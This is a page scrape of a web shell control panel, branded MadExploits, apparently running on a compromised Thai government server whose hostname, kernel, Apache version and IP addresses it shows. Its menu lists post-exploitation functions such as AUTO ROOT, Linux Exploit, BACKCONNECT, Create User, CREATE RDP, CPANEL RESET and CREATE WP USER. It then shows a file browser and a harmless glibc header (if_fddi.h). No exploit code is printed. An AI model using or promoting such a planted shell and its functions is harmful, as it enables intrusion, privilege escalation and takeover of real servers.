Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
netinet /
[ HOME SHELL ]
Name
Size
Permission
Action
ether.h
1.98
KB
-rw-r--r--
icmp6.h
11.3
KB
-rw-r--r--
if_ether.h
3.96
KB
-rw-r--r--
if_fddi.h
1.25
KB
-rw-r--r--
if_tr.h
3.69
KB
-rw-r--r--
igmp.h
4.58
KB
-rw-r--r--
in.h
18.84
KB
-rw-r--r--
in_systm.h
1.52
KB
-rw-r--r--
ip.h
9.3
KB
-rw-r--r--
ip6.h
5.33
KB
-rw-r--r--
ip_icmp.h
9.99
KB
-rw-r--r--
tcp.h
6.84
KB
-rw-r--r--
udp.h
3.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : if_fddi.h
/* Copyright (C) 1997 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. */ #ifndef _NETINET_IF_FDDI_H #define _NETINET_IF_FDDI_H 1 #include <sys/cdefs.h> #include <sys/types.h> #include <asm/types.h> #include <linux/if_fddi.h> #ifdef __USE_BSD struct fddi_header { u_int8_t fddi_fc; /* Frame Control (FC) value */ u_int8_t fddi_dhost[FDDI_K_ALEN]; /* Destination host */ u_int8_t fddi_shost[FDDI_K_ALEN]; /* Source host */ }; #endif #endif /* netinet/if_fddi.h */
Close